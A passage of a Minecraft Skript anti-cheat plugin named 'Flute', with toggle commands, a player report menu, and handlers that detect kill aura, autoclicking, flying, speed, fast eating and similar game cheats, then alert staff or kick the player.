  2483. execute player command "/fluteconf hacks"
  2484. stop
  2485. else:
  2486. set {flute.fastbb} to true
  2487. message "%{logo}% &2Fast Build/Break %{hackon}%"
  2488. execute player command "/fluteconf hacks"
  2489. stop
  2490. if arg 2 is "phase":
  2491. if {flute.phase} is true:
  2492. set {flute.phase} to false
  2493. message "%{logo}% &2Phase %{hackoff}%"
  2494. execute player command "/fluteconf hacks"
  2495. stop
  2496. else:
  2497. set {flute.phase} to true
  2498. message "%{logo}% &2Phase %{hackon}%"
  2499. execute player command "/fluteconf hacks"
  2500. stop
  2501. if arg 2 is "autoclicker":
  2502. if {flute.autoclicker} is true:
  2503. set {flute.autoclicker} to false
  2504. message "%{logo}% &2AutoClicker %{hackoff}%"
  2505. execute player command "/fluteconf hacks"
  2506. stop
  2507. else:
  2508. set {flute.autoclicker} to true
  2509. message "%{logo}% &2AutoClicker %{hackon}%"
  2510. execute player command "/fluteconf hacks"
  2511. stop
  2512. if arg 2 is "autosneak":
  2513. if {flute.autosneak} is true:
  2514. set {flute.autosneak} to false
  2515. message "%{logo}% &2AutoSneak %{hackoff}%"
  2516. execute player command "/fluteconf hacks"
  2517. stop
  2518. else:
  2519. set {flute.autosneak} to true
  2520. message "%{logo}% &2AutoSneak %{hackon}%"
  2521. execute player command "/fluteconf hacks"
  2522. stop
  2523. if arg 2 is "scaffold":
  2524. if {flute.scaffold} is true:
  2525. set {flute.scaffold} to false
  2526. message "%{logo}% &2Scaffold %{hackoff}%"
  2527. execute player command "/fluteconf hacks"
  2528. stop
  2529. else:
  2530. set {flute.scaffold} to true
  2531. message "%{logo}% &2Scaffold %{hackon}%"
  2532. execute player command "/fluteconf hacks"
  2533. stop
  2534. if arg 2 is "tower":
  2535. if {flute.tower} is true:
  2536. set {flute.tower} to false
  2537. message "%{logo}% &2Tower %{hackoff}%"
  2538. execute player command "/fluteconf hacks"
  2539. stop
  2540. else:
  2541. set {flute.tower} to true
  2542. message "%{logo}% &2Tower %{hackon}%"
  2543. execute player command "/fluteconf hacks"
  2544. stop
  2545. command /report [<player>]:
  2546. permission:
  2547. trigger:
  2548. if arg 1 is not set:
  2549. message " "
  2550. message "%{logo}% &2Make sure to specify which player you want to report!"
  2551. message " &7Usage: /report <player>"
  2552. message " "
  2553. stop
  2554. if arg 1 is set:
  2555. wait 3 tick
  2556. open chest with 2 rows named "&bReport: &e%arg 1%" to player
  2557. wait 3 ticks
  2558. format slot 1 of player with diamond sword named "&aKill Aura" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% killaura"]
  2559. format slot 2 of player with iron sword named "&aReach" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% reach"]
  2560. format slot 3 of player with feather named "&aFly" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% fly"]
  2561. format slot 4 of player with water bucket named "&aJesus" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% jesus"]
  2562. format slot 5 of player with cobweb named "&aAnti KB" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% antikb"]
  2563. format slot 6 of player with diamond boots named "&aSpeed" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% speed"]
  2564. format slot 7 of player with plank named "&aFast Build" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% fastbuild"]
  2565. format slot 8 of player with cobblestone named "&aFast Break" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% fastbreak"]
  2566. format slot 9 of player with stone named "&aScaffold" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% scaffold"]
  2567. format slot 10 of player with sandstone named "&aTower" with lore "&7Click to report" to close then run [make player execute command "/treport %arg 1% tower"]
  2568. stop
  2569. command /treport [<player>] [<text>]:
  2570. permission:
  2571. trigger:
  2572. if arg 1 is set:
  2573. if arg 2 is "killaura":
  2574. add arg 1 to {killaura::*}
  2575. message "%{logo}% %{reportsent}%"
  2576. loop all players:
  2577. if loop-player has permission "Flute.notify":
  2578. if {recieve.%loop-player%} is true:
  2579. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%KillAura" to loop-player
  2580. if arg 2 is "reach":
  2581. add arg 1 to {reach::*}
  2582. message "%{logo}% %{reportsent}%"
  2583. loop all players:
  2584. if loop-player has permission "Flute.notify":
  2585. if {recieve.%loop-player%} is true:
  2586. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%Reach" to loop-player
  2587. if arg 2 is "fly":
  2588. add arg 1 to {fly::*}
  2589. message "%{logo}% %{reportsent}%"
  2590. loop all players:
  2591. if loop-player has permission "Flute.notify":
  2592. if {recieve.%loop-player%} is true:
  2593. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%Fly" to loop-player
  2594. if arg 2 is "jesus":
  2595. add arg 1 to {jesus::*}
  2596. message "%{logo}% %{reportsent}%"
  2597. loop all players:
  2598. if loop-player has permission "Flute.notify":
  2599. if {recieve.%loop-player%} is true:
  2600. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%Jesus" to loop-player
  2601. if arg 2 is "antikb":
  2602. add arg 1 to {antikb::*}
  2603. message "%{logo}% %{reportsent}%"
  2604. loop all players:
  2605. if loop-player has permission "Flute.notify":
  2606. if {recieve.%loop-player%} is true:
  2607. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%AntiKB" to loop-player
  2608. if arg 2 is "speed":
  2609. add arg 1 to {speed::*}
  2610. message "%{logo}% %{reportsent}%"
  2611. loop all players:
  2612. if loop-player has permission "Flute.notify":
  2613. if {recieve.%loop-player%} is true:
  2614. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%Speed" to loop-player
  2615. if arg 2 is "fastbuild":
  2616. add arg 1 to {fastbuild::*}
  2617. message "%{logo}% %{reportsent}%"
  2618. loop all players:
  2619. if loop-player has permission "Flute.notify":
  2620. if {recieve.%loop-player%} is true:
  2621. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%FastBuild" to loop-player
  2622. if arg 2 is "fastbreak":
  2623. add arg 1 to {fastbreak::*}
  2624. message "%{logo}% %{reportsent}%"
  2625. loop all players:
  2626. if loop-player has permission "Flute.notify":
  2627. if {recieve.%loop-player%} is true:
  2628. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%FastBreak" to loop-player
  2629. if arg 2 is "tower":
  2630. add arg 1 to {tower::*}
  2631. message "%{logo}% %{reportsent}%"
  2632. loop all players:
  2633. if loop-player has permission "Flute.notify":
  2634. if {recieve.%loop-player%} is true:
  2635. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%Tower" to loop-player
  2636. if arg 2 is "scaffold":
  2637. add arg 1 to {scaffold::*}
  2638. message "%{logo}% %{reportsent}%"
  2639. loop all players:
  2640. if loop-player has permission "Flute.notify":
  2641. if {recieve.%loop-player%} is true:
  2642. send "%{logo}% %{maincolor3}%%arg 1% %{maincolor2}%Has been reported for: %{maincolor1}%Scaffold" to loop-player
  2643. command /reports [<text>]:
  2644. permission: flute.adminreports
  2645. trigger:
  2646. if arg 1 is not set:
  2647. message " "
  2648. message "%{logo}% %{checkreport1}%"
  2649. message "%{checkreport2}%"
  2650. message " "
  2651. stop
  2652. if arg 1 is "killaura":
  2653. message " "
  2654. message "%{logo}% %{unsolved}%"
  2655. message "%{killaura::*}%"
  2656. message " "
  2657. stop
  2658. if arg 1 is "reach":
  2659. message " "
  2660. message "%{logo}% %{unsolved}%"
  2661. message "%{reach::*}%"
  2662. message " "
  2663. stop
  2664. if arg 1 is "fly":
  2665. message " "
  2666. message "%{logo}% %{unsolved}%"
  2667. message "%{fly::*}%"
  2668. message " "
  2669. stop
  2670. if arg 1 is "jesus":
  2671. message " "
  2672. message "%{logo}% %{unsolved}%"
  2673. message "%{jesus::*}%"
  2674. message " "
  2675. stop
  2676. if arg 1 is "antikb":
  2677. message " "
  2678. message "%{logo}% %{unsolved}%"
  2679. message "%{antikb::*}%"
  2680. message " "
  2681. stop
  2682. if arg 1 is "speed":
  2683. message " "
  2684. message "%{logo}% %{unsolved}%"
  2685. message "%{speed::*}%"
  2686. message " "
  2687. stop
  2688. if arg 1 is "fastbuild":
  2689. message " "
  2690. message "%{logo}% %{unsolved}%"
  2691. message "%{fastbuild::*}%"
  2692. message " "
  2693. stop
  2694. if arg 1 is "fastbreak":
  2695. message " "
  2696. message "%{logo}% %{unsolved}%"
  2697. message "%{fastbreak::*}%"
  2698. message " "
  2699. stop
  2700. if arg 1 is "scaffold":
  2701. message " "
  2702. message "%{logo}% %{unsolved}%"
  2703. message "%{scaffold::*}%"
  2704. message " "
  2705. stop
  2706. if arg 1 is "tower":
  2707. message " "
  2708. message "%{logo}% %{unsolved}%"
  2709. message "%{tower::*}%"
  2710. message " "
  2711. stop
  2712. command /clearreports:
  2713. permission: flute.adminreports
  2714. trigger:
  2715. clear {killaura::*}
  2716. clear {reach::*}
  2717. clear {fly::*}
  2718. clear {jesus::*}
  2719. clear {antikb::*}
  2720. clear {speed::*}
  2721. clear {fastbuild::*}
  2722. clear {fastbreak::*}
  2723. clear {scaffold::*}
  2724. clear {tower::*}
  2725. message "%{logo}% %{reportscleared}%"
  2726. #=======================================================
  2727. # Flute | Anti-Cheat =
  2728. # Kill Aura =
  2729. #=======================================================
  2730. on damage:
  2731. if {flute.killaura} is true:
  2732. set {_mp} to {maxping} parsed as number
  2733. if attacker's ping < {_mp}:
  2734. if attacker doesn't have permission "flute.bypass":
  2735. if victim is a entity or a player:
  2736. if victim is not a ender dragon:
  2737. attacker is a player:
  2738. if damage cause is not a projectile:
  2739. if tool of the attacker is a bow or a snowball or a egg or a ender pearl or a fishing rod:
  2740. stop
  2741. else:
  2742. if damage wasn't caused by thorns:
  2743. add 1 to {dmg.%attacker%}
  2744. set {_ka} to {range} parsed as number
  2745. if distance between attacker and victim is greater than {_ka}:
  2746. cancel event
  2747. set {_p} to attacker's ping
  2748. add 1 to {killaura.%attacker%}
  2749. set {_dist} to distance between attacker and victim
  2750. if {t.ka.lastcheck} is not set:
  2751. set {t.ka.lastcheck} to now
  2752. if difference between now and {t.ka.lastcheck} is higher than 1.5 seconds:
  2753. loop all players:
  2754. if loop-player has permission "flute.notify":
  2755. if {recieve.%loop-player%} is true:
  2756. set {t.ka.lastcheck} to now
  2757. send "%{logo}% %{maincolor3}%%attacker% %{maincolor2}%(%{maincolor1}%Kill Aura%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{killaura.%attacker%}%Lv%{maincolor2}%) (%{maincolor1}%Range: &a%{_dist}% Blocks%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  2758. if {flute.debug.mode} is true:
  2759. set {_facing} to attacker's horizontal facing
  2760. set {_tool} to attacker's tool
  2761. set {_health} to attacker's health
  2762. set {_damage} to damage
  2763. send "&f&m-=-------------------------------=-" to loop-player
  2764. send "&f[DEBUG] - Facing: &7%{_facing}% &f[&d?&f]" to loop-player
  2765. send "&f[DEBUG] - Item: &7%{_tool}% &f[&e?&f]" to loop-player
  2766. send "&f[DEBUG] - Health: &7%{_health}% &f[&c?&f]" to loop-player
  2767. send "&f[DEBUG] - Damage: &7%{_damage}% &f[&4?&f]" to loop-player
  2768. send "&f&m-=-------------------------------=-" to loop-player
  2769. on damage:
  2770. if tool of the attacker is a sword:
  2771. attacker is blocking
  2772. cancel event
  2773. #=======================================================
  2774. # Flute | Anti-Cheat =
  2775. # Auto Clicker =
  2776. #=======================================================
  2777. on left click:
  2778. if {flute.autoclicker} is true:
  2779. set {_mp} to {maxping} parsed as number
  2780. if player's ping < {_mp}:
  2781. if player doesn't have permission "flute.bypass":
  2782. if player's tool is shears:
  2783. if targeted block is leaves:
  2784. stop
  2785. else:
  2786. set {_t} to player's tool
  2787. if player's tool is a shovel of efficiency:
  2788. stop
  2789. if player's tool is a shovel of efficiency 2:
  2790. stop
  2791. if player's tool is a shovel of efficiency 3:
  2792. stop
  2793. if player's tool is a shovel of efficiency 4:
  2794. stop
  2795. if player's tool is a shovel of efficiency 5:
  2796. stop
  2797. if player's tool is a pickaxe of efficiency:
  2798. stop
  2799. if player's tool is a pickaxe of efficiency 2:
  2800. stop
  2801. if player's tool is a pickaxe of efficiency 3:
  2802. stop
  2803. if player's tool is a pickaxe of efficiency 4:
  2804. stop
  2805. if player's tool is a pickaxe of efficiency 5:
  2806. stop
  2807. if player's tool is a axe of efficiency:
  2808. stop
  2809. if player's tool is a axe of efficiency 2:
  2810. stop
  2811. if player's tool is a axe of efficiency 3:
  2812. stop
  2813. if player's tool is a axe of efficiency 4:
  2814. stop
  2815. if player's tool is a axe of efficiency 5:
  2816. stop
  2817. else:
  2818. if event-block is not double-tall grass or grass or red flower or yellow flower or crops or carrot_plant or potato_plant or sugar_cane_block:
  2819. add 1 to {clicks.%player%}
  2820. set {_clicks} to {maxclicks} parsed as number
  2821. if {clicks.%player%} >= {_clicks}:
  2822. cancel event
  2823. set {_p} to player's ping
  2824. set {_cps} to {clicks.%player%}
  2825. set {_tar} to event-block
  2826. add 1 to {autoclicker.%player%}
  2827. loop all players:
  2828. if loop-player has permission "Flute.notify":
  2829. if {recieve.%loop-player%} is true:
  2830. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Auto Clicker%{maincolor2}%) (%{maincolor1}%CPS: %{_cps}%%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{autoclicker.%player%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%) (%{maincolor1}%Target Block: %{_tar}%%{maincolor2}%)" to loop-player
  2831. every second:
  2832. loop all players:
  2833. set {clicks.%loop-player%} to 0
  2834. #=======================================================
  2835. # Flute | Anti-Cheat =
  2836. # Multi Aura =
  2837. #=======================================================
  2838. on damage:
  2839. if {flute.multiaura} is true:
  2840. if attacker is player:
  2841. set {_mp} to {maxping} parsed as number
  2842. if attacker's ping < {_mp}:
  2843. if attacker's target is victim:
  2844. stop
  2845. else:
  2846. add 1 to {multiaura.%attacker%}
  2847. cancel event
  2848. loop all players:
  2849. if loop-player has permission "Flute.notify":
  2850. if {recieve.%loop-player%} is true:
  2851. send "%{logo}% %{maincolor3}%%attacker% %{maincolor2}%(%{maincolor1}%Multi Aura%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{multiaura.%attacker%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  2852. #=======================================================
  2853. # Flute | Anti-Cheat =
  2854. # Anti KB =
  2855. #=======================================================
  2856. on damage:
  2857. if {flute.antikb} is true:
  2858. if victim is a player:
  2859. set {antitestkb.%victim%} to true
  2860. set {_mp} to {maxping} parsed as number
  2861. if victim's ping < {_mp}:
  2862. if victim's health < victim's max health:
  2863. if block at victim's location is not cobweb or cactus or lava or water:
  2864. damage wasn't caused by lava, fire, burning, fall, poison or wither:
  2865. victim is not riding:
  2866. if victim's food level is not 0:
  2867. victim doesn't have poison:
  2868. victim doesn't have wither:
  2869. victim isn't burning:
  2870. wait 0.3 seconds
  2871. if {antitestkb.%victim%} is true:
  2872. victim isn't burning:
  2873. set {_p} to victim's ping
  2874. add 1 to {antikb.%victim%}
  2875. loop all players:
  2876. if loop-player has permission "Flute.notify":
  2877. if {recieve.%loop-player%} is true:
  2878. send "%{logo}% %{maincolor3}%%victim% %{maincolor2}%(%{maincolor1}%Anti KB%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  2879. else:
  2880. stop
  2881. on any movement:
  2882. if {antitestkb.%player%} is true:
  2883. clear {antitestkb.%player%}
  2884. stop
  2885. #=======================================================
  2886. # Flute | Anti-Cheat =
  2887. # Regen/Fast Eat =
  2888. #=======================================================
  2889. on heal:
  2890. if {flute.regen} is true:
  2891. set {_mp} to {maxping} parsed as number
  2892. if player's ping < {_mp}:
  2893. if player doesn't have permission "flute.bypass":
  2894. if player has regeneration:
  2895. stop
  2896. else:
  2897. set {_dif} to difference between {heal.%player%} and now
  2898. if {_dif} is less than 0.45 seconds:
  2899. cancel event
  2900. set {heal.%player%} to now
  2901. loop all players:
  2902. if loop-player has permission "Flute.notify":
  2903. if {recieve.%loop-player%} is true:
  2904. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Regen%{maincolor2}%) (%{maincolor1}%Healing speed: %{maincolor3}%%{_dif}%%{maincolor2}%)" to loop-player
  2905. set {heal.%player%} to now
  2906. on consume:
  2907. if {} is true:
  2908. set {_mp} to {maxping} parsed as number
  2909. if player's ping < {_mp}:
  2910. if player doesn't have permission "flute.bypass":
  2911. if player has saturation:
  2912. stop
  2913. else:
  2914. set {_dif} to difference between {eat.%player%} and now
  2915. if {_dif} is less than 1.60 seconds:
  2916. cancel event
  2917. set {eat.%player%} to now
  2918. loop all players:
  2919. if loop-player has permission "Flute.notify":
  2920. if {recieve.%loop-player%} is true:
  2921. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Fast Eat%{maincolor2}%) (%{maincolor1}%Eating speed: %{maincolor3}%%{_dif}%%{maincolor2}%)" to loop-player
  2922. set {eat.%player%} to now
  2923. on consume:
  2924. if {flute.debug.mode} is true:
  2925. if player's name is "GotPower":
  2926. if {eaten.xenons.%player%} is not set:
  2927. set {eaten.xenons.%player%} to now
  2928. stop
  2929. else:
  2930. set {_difeat} to difference between {eaten.xenons.%player%} and now
  2931. broadcast "%{_difeat}%"
  2932. clear {eaten.xenons.%player%}
  2933. stop
  2934. on heal:
  2935. if {flute.debug.mode} is true:
  2936. if player's name is "GotPower":
  2937. if {regen.xenons.%player%} is not set:
  2938. set {regen.xenons.%player%} to now
  2939. stop
  2940. else:
  2941. set {_difeat} to difference between {regen.xenons.%player%} and now
  2942. broadcast "%{_difeat}%"
  2943. clear {regen.xenons.%player%}
  2944. stop
  2945. #=======================================================
  2946. # Flute | Anti-Cheat =
  2947. # Auto Sneak =
  2948. #=======================================================
  2949. on chat:
  2950. if {flute.autosneak} is true:
  2951. set {_mp} to {maxping} parsed as number
  2952. if player's ping < {_mp}:
  2953. if player doesn't have permission "flute.bypass":
  2954. if player is sneaking:
  2955. add 1 to {sneaking.%player%}
  2956. loop all players:
  2957. if loop-player has permission "Flute.notify":
  2958. if {recieve.%loop-player%} is true:
  2959. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Auto Sneak%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{sneaking.%player%}%Lv%{maincolor2}%)" to loop-player
  2960. stop
  2961. on command:
  2962. if {flute.autosneak} is true:
  2963. set {_mp} to {maxping} parsed as number
  2964. if player's ping < {_mp}:
  2965. if player doesn't have permission "flute.bypass":
  2966. if player is sneaking:
  2967. add 1 to {sneaking.%player%}
  2968. loop all players:
  2969. if loop-player has permission "Flute.notify":
  2970. if {recieve.%loop-player%} is true:
  2971. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Auto Sneak%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{sneaking.%player%}%Lv%{maincolor2}%)" to loop-player
  2972. stop
  2973. #=======================================================
  2974. # Flute | Anti-Cheat =
  2975. # Fast Place/Break =
  2976. #=======================================================
  2977. on place:
  2978. if {flute.fastbb} is true:
  2979. set {_mp} to {maxping} parsed as number
  2980. if player's ping < {_mp}:
  2981. if player doesn't have permission "flute.bypass":
  2982. if player's gamemode is survival:
  2983. if event-block is not double-tall grass or grass or red flower or yellow flower or crops or carrot_plant or potato_plant or sugar_cane_block:
  2984. set {_seconds} to "%{fastplaceticks}% seconds"
  2985. set {_dif} to difference between {fastplacetest.%player%} and now
  2986. if {_dif} is less than {_seconds}:
  2987. cancel event
  2988. add 1 to {fastplace.%player%}
  2989. set {_p} to player's ping
  2990. loop all players:
  2991. if loop-player has permission "Flute.notify":
  2992. if {recieve.%loop-player%} is true:
  2993. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Fast Place%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{fastplace.%player%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%) (%{maincolor1}%Block: %{_p}%%event-block%)" to loop-player
  2994. set {fastplacetest.%player%} to now
  2995. stop
  2996. on break:
  2997. if {flute.fastbb} is true:
  2998. set {_mp} to {maxping} parsed as number
  2999. if player's ping < {_mp}:
  3000. if player doesn't have permission "flute.bypass":
  3001. if player's gamemode is survival:
  3002. if event-block is not double-tall grass or red flower or yellow flower or 59 or 141 or 142 or sugar_cane_block:
  3003. set {_seconds} to "%{fastbreakticks}% seconds"
  3004. set {_dif} to difference between {fastbreaktest.%player%} and now
  3005. if {_dif} is less than {_seconds}:
  3006. cancel event
  3007. add 1 to {fastbreak.%player%}
  3008. set {_p} to player's ping
  3009. loop all players:
  3010. if loop-player has permission "Flute.notify":
  3011. if {recieve.%loop-player%} is true:
  3012. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Fast Break%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{fastbreak.%player%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%) (%{maincolor1}%Block: %{_p}%%event-block%)" to loop-player
  3013. set {fastbreaktest.%player%} to now
  3014. stop
  3015. #=======================================================
  3016. # Flute | Anti-Cheat =
  3017. # Fly/Jesus =
  3018. #=======================================================
  3019. on any movement:
  3020. if {} is true:
  3021. set {_mp} to {maxping} parsed as number
  3022. if player's ping < {_mp}:
  3023. if player is not riding:
  3024. if player doesn't have permission "flute.bypass":
  3025. if player's gamemode is survival or adventure:
  3026. if player's health < player's max health:
  3027. if block under player is air:
  3028. set {_b} to block under player
  3029. if block under {_b} is air:
  3030. set {_y1} to y-coordinates of player
  3031. if block behind {_b} is air:
  3032. if block 1 meter south of {_b} is air:
  3033. if block 1 meter west of {_b} is air:
  3034. if block 1 meter east of {_b} is air:
  3035. if block 1 meter north of {_b} is air:
  3036. wait 5 ticks
  3037. set {_y2} to y-coordinates of player
  3038. if {_y2} is higher than or equal to {_y1}:
  3039. if difference between {_y2} and {_y1} is higher than 1.4:
  3040. chestplate of player is neither a chestplate nor air:
  3041. stop
  3042. else:
  3043. add 1 to {fly.%player%}
  3044. push player downwards at speed 1.2
  3045. if {} is not set:
  3046. set {} to now
  3047. set {_p} to player's ping
  3048. set {_block} to block under player
  3049. if difference between now and {} is higher than 1.5 seconds:
  3050. loop all players:
  3051. if loop-player has permission "Flute.notify":
  3052. if {recieve.%loop-player%} is true:
  3053. set {} to now
  3054. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Fly%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{fly.%player%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%) (%{maincolor1}%Block under: %{_block}%%{maincolor2}%)" to loop-player
  3055. if {fly.%player%} > 5:
  3056. remove 2 from {fly.%player%}
  3057. kick player due to "%{logo}% %{maincolor1}%Fly &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3058. on any movement:
  3059. if {flute.jesus} is true:
  3060. set {_mp} to {maxping} parsed as number
  3061. if player's ping < {_mp}:
  3062. if player is not riding:
  3063. if player doesn't have permission "flute.bypass":
  3064. if player's gamemode is survival or adventure:
  3065. if player is not sneaking:
  3066. if block above player is air:
  3067. set {_b} to block under player
  3068. if block under {_b} is water:
  3069. set {_y1} to y-coordinates of player
  3070. set {_x1} to x-coordinates of player
  3071. set {_z1} to z-coordinates of player
  3072. set {_loc} to location of player
  3073. if block behind {_b} is water:
  3074. if block 1 meter south of {_b} is water:
  3075. if block 1 meter west of {_b} is water:
  3076. if block 1 meter east of {_b} is water:
  3077. if block 1 meter north of {_b} is water:
  3078. wait 5 ticks
  3079. set {_y2} to y-coordinates of player
  3080. set {_x2} to x-coordinates of player
  3081. set {_z2} to z-coordinates of player
  3082. set {_loc2} to location of player
  3083. if {_y1} = {_y2}:
  3084. if {_loc} = {_loc2}:
  3085. stop
  3086. else:
  3087. if difference between {_x2} and {_x1} is less than 1:
  3088. if difference between {_z2} and {_z1} is less than 1:
  3089. stop
  3090. if difference between {_z2} and {_z1} is less than 1:
  3091. if difference between {_x2} and {_x1} is less than 1:
  3092. stop
  3093. else:
  3094. add 1 to {jesus.%player%}
  3095. if {t.jesus.lastcheck} is not set:
  3096. set {t.jesus.lastcheck} to now
  3097. set {_p} to player's ping
  3098. if difference between now and {t.jesus.lastcheck} is higher than 1.5 seconds:
  3099. loop all players:
  3100. if loop-player has permission "Flute.notify":
  3101. if {recieve.%loop-player%} is true:
  3102. set {t.jesus.lastcheck} to now
  3103. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Jesus%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{fly.%player%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3104. if {jesus.%player%} > 10:
  3105. remove 5 from {jesus.%player%}
  3106. kick player due to "%{logo}% %{maincolor1}%Jesus &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3107. #=======================================================
  3108. # Flute | Anti-Cheat =
  3109. # Fast Bow =
  3110. #=======================================================
  3111. on shoot:
  3112. if {flute.fastbow} is true:
  3113. set {_mp} to {maxping} parsed as number
  3114. if shooter's ping < {_mp}:
  3115. if shooter doesn't have permission "flute.bypass":
  3116. if shooter's tool is bow:
  3117. if {shot.%shooter%} is not set:
  3118. set {shot.%shooter%} to now
  3119. stop
  3120. else:
  3121. set {_seconds} to {fastbowticks} parsed as number
  3122. set {_p} to shooter's ping
  3123. set {_justshot} to difference between {shot.%shooter%} and now
  3124. if difference between {shot.%shooter%} and now is less than 0.12 seconds:
  3125. add 1 to {fastbow.%shooter%}
  3126. cancel event
  3127. loop all players:
  3128. if loop-player has permission "Flute.notify":
  3129. if {recieve.%loop-player%} is true:
  3130. send "%{logo}% %{maincolor3}%%shooter% %{maincolor2}%(%{maincolor1}%Fast Bow%{maincolor2}%) %{maincolor2}%(%{maincolor1}%%{fastbow.%shooter%}%Lv%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3131. clear {shot.%shooter%}
  3132. on shoot:
  3133. if {flute.debug.mode} is true:
  3134. if shooter's name is "GotPower":
  3135. if shooter's tool is bow:
  3136. if {shottest.%shooter%} is not set:
  3137. set {shottest.%shooter%} to now
  3138. else:
  3139. set {_dif} to difference between now and {shottest.%shooter%}
  3140. broadcast "%{_dif}%"
  3141. clear {shottest.%shooter%}
  3142. stop
  3143. #=======================================================
  3144. # Flute | Anti-Cheat =
  3145. # Bunny Hop/Speed =
  3146. #=======================================================
  3147. on any movement:
  3148. if {flute.bhp} is true:
  3149. set {_mp} to {maxping} parsed as number
  3150. if player's ping < {_mp}:
  3151. if player is not riding:
  3152. if player doesn't have permission "flute.bypass":
  3153. if player's gamemode is survival or adventure:
  3154. if player's flight mode is false:
  3155. if player has speed:
  3156. stop
  3157. else:
  3158. set {_blocks} to {speedblocks} parsed as number
  3159. if block under player is not air:
  3160. set {} to true
  3161. set {_bhp1x} to x-coordinates of player
  3162. wait 1 second
  3163. set {_bhp2x} to x-coordinates of player
  3164. wait 1 tick
  3165. if {} is not set:
  3166. stop
  3167. else:
  3168. if block under player is not ice:
  3169. if {t.bhp.lastcheck} is not set:
  3170. set {t.bhp.lastcheck} to now
  3171. set {_t} to difference between {_bhp1x} and {_bhp2x}
  3172. set {_t2} to difference between {_bhp1y} and {_bhp2y}
  3173. if {_t} > {_blocks}:
  3174. add 1 to {bhp.%player%}
  3175. set {_p} to player's ping
  3176. clear {}
  3177. if difference between now and {t.bhp.lastcheck} is higher than 3 seconds:
  3178. loop all players:
  3179. if loop-player has permission "Flute.notify":
  3180. if {recieve.%loop-player%} is true:
  3181. set {t.bhp.lastcheck} to now
  3182. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Speed%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{bhp.%player%}%%{maincolor2}%) (%{maincolor1}%8+ Blocks/s%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3183. if {_2} > {_blocks}:
  3184. add 1 to {bhp.%player%}
  3185. set {_p} to player's ping
  3186. if difference between now and {t.bhp.lastcheck} is higher than 3 seconds:
  3187. loop all players:
  3188. if loop-player has permission "Flute.notify":
  3189. if {recieve.%loop-player%} is true:
  3190. set {t.bhp.lastcheck} to now
  3191. send "%{logo}% %{maincolor3}%%player% %{maincolor2}%(%{maincolor1}%Speed%{maincolor2}%) %{maincolor2}%(%{maincolor1}%Lv%{bhp.%player%}%%{maincolor2}%) (%{maincolor1}%8+ Blocks/s%{maincolor2}%) (%{maincolor1}%Ping: %{_p}%%{maincolor2}%)" to loop-player
  3192. if {bhp.%player%} > 30:
  3193. remove 10 from {bhp.%player%}
  3194. kick player due to "%{logo}% %{maincolor1}%Speed &ais not allowed!%new line%&cPlease turn off your hacks before re-login!%new line%%new line%%{banmsg3}%"
  3195. on teleport:
  3196. if {} is true:
  3197. clear {}
  3198. stop
  3199. #=======================================================
  3200. # Flute | Anti-Cheat =
  3201. # Phase =
  3202. #=======================================================
  3203. #=======================================================
  3204. # Flute | Anti-Cheat =
  3205. # Scaffold / Tower =
  3206. #=======================================================
